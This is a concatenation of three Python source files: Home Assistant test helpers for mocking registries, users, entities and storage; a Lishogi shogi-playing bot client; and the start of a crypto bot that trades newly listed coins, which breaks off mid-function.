async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = ReceiveMessage(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(
hass: HomeAssistant, datetime_: datetime = None, fire_all: bool = False
) -> None:
"""Fire a time changed event."""
if datetime_ is None:
datetime_ = date_util.utcnow()
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def get_fixture_path(filename: str, integration: str | None = None) -> pathlib.Path:
"""Get path of fixture."""
if integration is None and "/" in filename and not filename.startswith("helpers/"):
integration, filename = filename.split("/", 1)
if integration is None:
return pathlib.Path(__file__).parent.joinpath("fixtures", filename)
else:
return pathlib.Path(__file__).parent.joinpath(
"components", integration, "fixtures", filename
)
def load_fixture(filename, integration=None):
"""Load a fixture."""
return get_fixture_path(filename, integration).read_text()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
if mock_entries is None:
mock_entries = {}
registry.entities = entity_registry.EntityRegistryItems()
for key, entry in mock_entries.items():
registry.entities[key] = entry
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
pref_disable_new_entities=None,
pref_disable_polling=None,
unique_id=None,
disabled_by=None,
reason=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid_util.random_uuid_hex(),
"domain": domain,
"data": data or {},
"pref_disable_new_entities": pref_disable_new_entities,
"pref_disable_polling": pref_disable_polling,
"options": options,
"version": version,
"title": title,
"unique_id": unique_id,
"disabled_by": disabled_by,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
if reason is not None:
self.reason = reason
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries[self.entry_id] = self
hass.config_entries._domain_index.setdefault(self.domain, []).append(
self.entry_id
)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries[self.entry_id] = self
manager._domain_index.setdefault(self.domain, []).append(self.entry_id)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(files_dict.keys(), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
"""Initialize the recorder asynchronously."""
config = add_config or {}
if recorder.CONF_DB_URL not in config:
config[recorder.CONF_DB_URL] = "sqlite://"
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert await async_setup_component(
hass, recorder.DOMAIN, {recorder.DOMAIN: config}
)
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def entity_category(self):
"""Return the entity category."""
return self._handle("entity_category")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
@property
def icon(self):
"""Return the suggested icon."""
return self._handle("icon")
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
raise_contains_mocks(data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module, built_in=True):
"""Mock an integration."""
integration = loader.Integration(
hass,
f"{loader.PACKAGE_BUILTIN}.{module.DOMAIN}"
if built_in
else f"{loader.PACKAGE_CUSTOM_COMPONENTS}.{module.DOMAIN}",
None,
module.mock_manifest(),
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
def raise_contains_mocks(val):
"""Raise for mocks."""
if isinstance(val, Mock):
raise ValueError
if isinstance(val, dict):
for dict_value in val.values():
raise_contains_mocks(dict_value)
if isinstance(val, list):
for dict_value in val:
raise_contains_mocks(dict_value)
|
lishogibot.py | import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
from multiprocessing import Process
import signal
import backoff
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import HTTPError, ReadTimeout
from util import switchusiuci,makeusi,makesfenfromfen
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.6.0"
terminated = False
def signal_handler(signal, frame):
global terminated
logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
logger.info("start")
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode('utf-8'))
control_queue.put_nowait(event)
logger.info(event)
except:
logger.info("except")
pass
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
control_queue=multiprocessing.Manager().Queue()
control_stream = Process(target=watch_control_stream, args=[control_queue,li])
control_stream.start()
while not terminated:
event=control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "challenge":
logger.info("chlng detected")
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
logger.info("chlng supported")
try:
logger.info(" Accept {}".format(chlng))
response = li.accept_challenge(chlng.id)
logger.info(chlng.id)
except (HTTPError, ReadTimeout) as exception:
if isinstance(exception, HTTPError) and exception.response.status_code == 404: # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except:
pass
elif event["type"] == "gameStart":
logger.info("game detected")
game_id = event["game"]["id"]
play_game(li, game_id, engine_factory, user_profile, config)
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, engine_factory, user_profile, config):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
#Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode('utf-8'))
game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
board = setup_board(game)
engineeng = engine_factory(board)
logger.info("+++ {}".format(game))
if is_engine_move(game,board.move_stack) and not is_game_over(game):
move=engineeng.search(board,5000,5000,1,1)
finalmove=switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
while not terminated:
try:
binary_chunk = next(lines)
except(StopIteration):
break
upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if not board.is_game_over():
if u_type == "gameState":
game.state=upd
moves = upd["moves"].split()
board = update_board(board, moves[-1])
if not is_game_over(game) and is_engine_move(game, moves):
move=engineeng.search(board,upd['wtime'],upd['btime'],upd['winc'],upd['binc'])
finalmove=switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
if board.turn == shogi.BLACK:
game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
else:
game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
else:
logger.info("game over")
engineeng.quit()
break
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def setup_board(game):
if game.variant_name == "From Position":
board = shogi.Board(makesfenfromfen(game.initial_fen))
else:
board = shogi.Board() # Standard
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def is_game_over(game):
return game.state["status"] != "started"
def update_board(board, move):
usi_move = shogi.Move.from_usi(makeusi(move))
if board.is_legal(usi_move):
board.push(usi_move)
else:
logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
return board
def intro():
return r"""
. _/\_
. //o o\\
. || || lishogi-bot %s
. || ||
. ||____|| Play on Lishogi with a bot
""" % __version__
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
format="%(asctime)-15s: %(message)s")
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
main.py | from collections import defaultdict
import copy
from datetime import datetime, time
from json import JSONEncoder
import json
import os.path
import sys, os
import threading
import time
import globals
from load_config import *
from logger import logger
from new_listings_scraper import *
from store_order import *
from trade_client import *
# To add a coin to ignore, add it to the json array in old_coins.json
globals.old_coins = load_old_coins()
logger.debug(f"old_coins: {globals.old_coins}")
# loads local configuration
config = load_config('config.yml')
# load necessary files
if os.path.isfile('sold.json'):
sold_coins = load_order('sold.json')
else:
sold_coins = {}
if os.path.isfile('order.json'):
order = load_order('order.json')
else:
order = {}
# memory store for all orders for a specific coin
if os.path.isfile('session.json'):
session = load_order('session.json')
else:
session = {}
# Keep the supported currencies loaded in RAM so no time is wasted fetching
# currencies.json from disk when an announcement is made
global supported_currencies
logger.debug("Starting get_all_currencies")
supported_currencies = get_all_currencies(single=True)
logger.debug("Finished get_all_currencies")
def buy():
while not globals.stop_threads:
logger.debug('Waiting for buy_ready event')
globals.buy_ready.wait()
logger.debug('buy_ready event triggered')
if globals.stop_threads:
break
announcement_coin = globals.latest_listing
global supported_currencies
if announcement_coin and \
announcement_coin not in order and \
announcement_coin not in sold_coins and \
announcement_coin not in globals.old_coins:
logger.info(
f'New announcement detected: {announcement_coin}')
if not supported_currencies:
supported_currencies = get_all_currencies(single=True)
if supported_currencies:
if announcement_coin in supported_currencies:
logger.debug("Starting get_last_price")
# get latest price object
obj = get_last_price(announcement_coin, globals.pairing, False)
price = obj.price
if float(price) <= 0:
continue # wait for positive price
if announcement_coin not in session:
session[announcement_coin] = {}
session[announcement_coin].update({'total_volume': 0})
session[announcement_coin].update({'total_amount': 0})
session[announcement_coin].update({'total_fees': 0})
session[announcement_coin]['orders'] = list()
# initalize order object
if announcement_coin not in order:
volume = globals.quantity - session[announcement_coin]['total_volume']
order[announcement_coin] = {}
order[announcement_coin]['_amount'] = f'{volume / float(price)}'
order[announcement_coin]['_left'] = f'{volume / float(price)}'
order[announcement_coin]['_fee'] = f'{0}'
order[announcement_coin]['_tp'] = f'{0}'
order[announcement_coin]['_sl'] = f'{0}'
order[announcement_coin]['_status'] = 'unknown'
if announcement_coin in session:
if len(session[announcement_coin]['orders']) == 0:
order[announcement_coin]['_status'] = 'test_partial_fill_order'
else:
order[announcement_coin]['_status'] = 'cancelled'
amount = float(order[announcement_coin]['_amount'])
left = float(order[announcement_coin]['_left'])
status = order[announcement_coin]['_status']
if left - amount != 0:
# partial fill.
amount = left
logger.info(
f'starting buy place_order with : {announcement_coin=} | {globals.pairing=} | {volume=} | {amount=} x {price=} | side = buy | {status=}')
try:
# Run a test trade if true
if globals.test_mode:
if order[announcement_coin]['_status'] == 'cancelled':
status = 'closed'
left = 0
fee = f'{float(amount) * .002}'
else:
status = 'cancelled'
left = f'{amount *.66}'
fee = f'{float(amount - float(left)) * .002}'
order[announcement_coin] = {
'_fee_currency': announcement_coin,
'_price': f'{price}',
'_amount': f'{amount}',
'_time': datetime.timestamp(datetime.now()),
'_tp': globals.tp,
'_sl': globals.sl,
'_ttp': globals.ttp,
'_tsl': globals.tsl,
'_id': 'test-order',
'_text': 'test-order',
'_create_time': datetime.timestamp(datetime.now()),
'_update_time': datetime.timestamp(datetime.now()),
'_currency_pair': f'{announcement_coin}_{globals.pairing}',
'_status': status,
'_type': 'limit',
'_account': 'spot',
'_side': 'buy',
'_iceberg': '0',
'_left': f'{left}',
'_fee': fee
}
logger.info('PLACING TEST ORDER')
logger.info(order[announcement_coin])
# place a live order if False
else:
# just in case...stop buying more than our config amount
assert amount * float(price) <= float(volume)
order[announcement_coin] = place_order(announcement_coin, globals.pairing, volume, 'buy', price)
order[announcement_coin] = order[announcement_coin].__dict__
order[announcement_coin].pop("local_vars_configuration")
order[announcement_coin]['_tp'] = globals.tp
order[announcement_coin]['_sl'] = globals.sl
order[announcement_coin]['_ttp'] = globals.ttp
order[announcement_coin]['_tsl'] = globals.tsl
logger.debug('Finished buy place_order')
except Exception as e:
logger.error(e)
else:
order_status = order[announcement_coin]['_status']
logger.info(
f'Order created on {announcement_coin} at a price of {price} each. {order_status=}')
if order_status == "closed":
order[announcement_coin]['_amount_filled'] = order[announcement_coin]['_amount']
session[announcement_coin]['total_volume'] += (float(order[announcement_coin]['_amount']) * float(order[announcement_coin]['_price']))
session[announcement_coin]['total_amount'] += float(order[announcement_coin]['_amount'])
session[announcement_coin]['total_fees'] += float(order[announcement_coin]['_fee'])
session[announcement_coin]['orders'].append(copy.deepcopy(order[announcement_coin]))
# update order to sum all amounts and all fees
# this will set up our sell order for sale of all filled buy orders
tf = session[announcement_coin]['total_fees']
ta = session[announcement_coin]['total_amount']
order[announcement_coin]['_fee'] = f'{tf}'
order[announcement_coin]['_amount'] = f'{ta}'
store_order('order.json', order)
store_order('session.json', session)
# We're done. Stop buying and finish up the selling.
globals.sell_ready.set()
globals.buy_ready.clear()
logger.info(
f'Order on {announcement_coin} closed')
else:
